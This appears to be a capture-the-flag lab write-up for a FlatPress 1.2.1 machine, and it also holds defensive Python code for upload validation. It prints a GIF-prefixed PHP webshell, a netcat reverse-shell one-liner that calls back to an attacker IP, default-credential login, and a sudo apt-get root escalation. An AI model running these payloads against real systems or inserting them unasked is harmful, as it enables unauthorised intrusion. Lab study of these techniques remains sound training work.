# Press

`flatpress` `file upload`

* Machine name: Press
* Difficulty: Intermediate
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 17:15 EDT
Nmap scan report for 192.168.208.29
Host is up (0.035s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Lugx Gaming Shop HTML5 Template
8089/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-generator: FlatPress fp-1.2.1
|_http-title: FlatPress
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (8089)

```
┌──(kali㉿kali)-[~/oscp/pyload]
└─$ dirsearch -u http://192.168.208.29:8089/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/oscp/pyload/reports/http_192.168.208.29_8089/__24-08-27_17-17-11.txt

Target: http://192.168.208.29:8089/

[17:17:11] Starting: 
[17:17:13] 200 -  218B  - /.gitignore
[17:17:13] 403 -  281B  - /.ht_wsr.txt
[17:17:14] 403 -  281B  - /.htaccess.bak1
[17:17:14] 403 -  281B  - /.htaccess.orig
[17:17:14] 403 -  281B  - /.htaccess.sample
[17:17:14] 403 -  281B  - /.htaccess.save
[17:17:14] 403 -  281B  - /.htaccess_extra
[17:17:14] 403 -  281B  - /.htaccess_orig
[17:17:14] 403 -  281B  - /.htaccessBAK
[17:17:14] 403 -  281B  - /.htaccess_sc
[17:17:14] 403 -  281B  - /.htaccessOLD
[17:17:14] 403 -  281B  - /.htaccessOLD2
[17:17:14] 403 -  281B  - /.htm
[17:17:14] 403 -  281B  - /.html
[17:17:14] 403 -  281B  - /.htpasswd_test
[17:17:14] 403 -  281B  - /.htpasswds
[17:17:14] 403 -  281B  - /.httr-oauth
[17:17:14] 403 -  281B  - /.php
[17:17:17] 301 -  323B  - /admin  ->  http://192.168.208.29:8089/admin/
[17:17:17] 302 -    0B  - /admin.php  ->  http://192.168.208.29:8089/login.php
[17:17:17] 200 -  305B  - /admin/
[17:17:17] 200 -  305B  - /admin/index.php
[17:17:22] 200 -   10KB - /CHANGELOG.md
[17:17:23] 200 -    2KB - /contact.php
[17:17:24] 301 -  322B  - /docs  ->  http://192.168.208.29:8089/docs/
[17:17:24] 200 -  499B  - /docs/
[17:17:26] 404 -    5KB - /index.php/login/
[17:17:28] 200 -   18KB - /LICENSE.md
[17:17:28] 200 -    2KB - /login.php
[17:17:33] 200 -    2KB - /README.md
[17:17:34] 301 -    0B  - /rss.php  ->  http://192.168.208.29:8089/?x=feed:rss2&
[17:17:34] 200 -    3KB - /search.php
[17:17:34] 403 -  281B  - /server-status
[17:17:34] 403 -  281B  - /server-status/
[17:17:35] 200 -  305B  - /setup/
[17:17:35] 301 -  323B  - /setup  ->  http://192.168.208.29:8089/setup/
[17:17:36] 302 -    0B  - /static.php  ->  http://192.168.208.29:8089/
```

The /CHANGELOG.md file gives us the version: FlatPress 1.2.1 (nmap's http-generator header already reported fp-1.2.1).

We can try logging in at /login.php as admin:password.

## Initial access

### File Upload

The FlatPress admin uploader only looks at the leading bytes of the file to decide whether it is an image (see the linked issue), so a file named `.php` whose content starts with a GIF signature is accepted. It is stored under `fp-content/attachs/` inside the web root, where Apache runs it as PHP. We therefore prefix a PHP webshell with `GIF89a;` and upload it through the admin panel:

{% embed url="https://github.com/flatpressblog/flatpress/issues/152" %}

```
┌──(kali㉿kali)-[~/oscp]
└─$ cat shellgif.php
GIF89a;
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FlIwTqSN9AMEGf9pShnmN%2Fea888ee010024e93c12b9fe949d91ba1-2.png?alt=media&#x26;token=9f3d6b16-a980-42ea-a28c-3e44a750a2f5" alt=""><figcaption></figcaption></figure>

Once the uploaded shell is reachable, pass a reverse shell one-liner through its `cmd` parameter, with a listener waiting on 192.168.45.224:1234:

`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.224 1234 >/tmp/f`

```
┌──(kali㉿kali)-[~/oscp]
└─$ nc -lnvp 1234    
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.29] 60728
bash: cannot set terminal process group (601): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/var/www/flatpress/fp-content/attachs$ whoami
whoami
www-data
```
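As an added example, not part of this writeup and not FlatPress code, here is the kind of check the `GIF89a;` prefix defeats next to a stricter one: a magic-byte-only test accepts shellgif.php because it starts with a GIF signature, whereas an allowlist on the extension, a signature that must match that extension, a walk of the GIF block structure and a server-chosen filename all reject it. Function names, the allowlist and the two sample files are my own constructions.

```python
# Added example, not from the writeup or from FlatPress: the upload check the
# GIF89a prefix defeats, next to a stricter one. Function names, the allowlist
# and the sample files below are assumptions made for this illustration.
import secrets
from pathlib import Path

# Constructed polyglot, built like the writeup's shellgif.php: GIF signature,
# the GIF trailer byte ';', then PHP.
SHELLGIF = b'GIF89a;\n<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>\n'

# Constructed, valid 1x1 GIF (43 bytes) for comparison.
REAL_GIF = bytes.fromhex(
    "474946383961"                       # "GIF89a"
    "0100" "0100" "80" "00" "00"         # logical screen 1x1, global colour table (2 entries)
    "000000" "ffffff"                    # the colour table
    "21f904" "01" "0000" "00" "00"       # graphic control extension
    "2c" "00000000" "0100" "0100" "00"   # image descriptor
    "02" "024401" "00"                   # LZW min code size, one data sub-block, terminator
    "3b"                                 # trailer
)

SIGNATURES = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}


def weak_is_image(data: bytes) -> bool:
    """What a naive uploader checks: only the leading bytes, never the name."""
    return any(data.startswith(sig) for sigs in SIGNATURES.values() for sig in sigs)


def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Advance over length-prefixed sub-blocks, up to and past the 0x00 terminator."""
    while pos < len(data) and data[pos] != 0:
        pos += 1 + data[pos]
    return pos + 1


def gif_is_well_formed(data: bytes) -> bool:
    """Walk the GIF block structure; the 0x3B trailer must be the last byte."""
    if not data.startswith(SIGNATURES[".gif"]) or len(data) < 13:
        return False
    pos = 13                                    # header (6) + logical screen descriptor (7)
    if data[10] & 0x80:                         # global colour table follows
        pos += 3 * (2 << (data[10] & 0x07))
    while pos < len(data):
        tag = data[pos]
        if tag == 0x3B:                         # trailer
            return pos == len(data) - 1
        if tag == 0x21:                         # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 2)
        elif tag == 0x2C:                       # image descriptor (10 bytes)
            if pos + 10 > len(data):
                return False
            local = data[pos + 9]
            pos += 10
            if local & 0x80:                    # local colour table
                pos += 3 * (2 << (local & 0x07))
            pos = _skip_sub_blocks(data, pos + 1)   # +1 skips the LZW minimum code size
        else:
            return False                        # e.g. the 'p' of "<?php" in the polyglot
    return False


def strict_validate(filename: str, data: bytes) -> "tuple[bool, str]":
    """Allowlisted extension, signature matching that extension, sane structure."""
    ext = Path(filename).suffix.lower()
    if ext not in SIGNATURES:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(SIGNATURES[ext]):
        return False, f"content does not match {ext}"
    if ext == ".gif" and not gif_is_well_formed(data):
        return False, "GIF structure invalid (polyglot?)"
    return True, "ok"


def server_side_name(filename: str) -> str:
    """Never keep the client's name: random stem, extension taken from the allowlist."""
    return secrets.token_hex(16) + Path(filename).suffix.lower()


def store_upload(filename: str, data: bytes, dest_dir: Path) -> Path:
    """Validate, then write under a server-chosen name; raises on rejection."""
    ok, reason = strict_validate(filename, data)
    if not ok:
        raise ValueError(reason)
    target = dest_dir / server_side_name(filename)
    target.write_bytes(data)
    return target


if __name__ == "__main__":
    print("weak check, shellgif.php:", weak_is_image(SHELLGIF))            # True
    print("strict check, shellgif.php:", strict_validate("shellgif.php", SHELLGIF))
    print("strict check, shellgif.gif:", strict_validate("shellgif.gif", SHELLGIF))
    print("strict check, avatar.gif:", strict_validate("avatar.gif", REAL_GIF))
```

Renaming the polyglot to `.gif` gets it past the extension allowlist and the signature check but not the structure walk, because the byte after `GIF89a;` is not a valid block tag. Content checks alone are still not the whole fix: the attachment directory should also be served without PHP execution, so that a file that slips through is returned as bytes rather than run.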

## Privilege escalation

```
www-data@debian:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/apt-get
```

www-data may run /usr/bin/apt-get as root without a password and with no restriction on its arguments. apt-get takes configuration options on the command line, and APT::Update::Pre-Invoke is a hook that runs a shell command before `apt-get update`, as the invoking user, here root. The GTFOBins entry therefore gives a root shell directly, whether or not the update itself would succeed afterwards:

{% embed url="https://gtfobins.github.io/gtfobins/apt-get/#sudo" %}

```
www-data@debian:/home$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
<apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
whoami
root
```
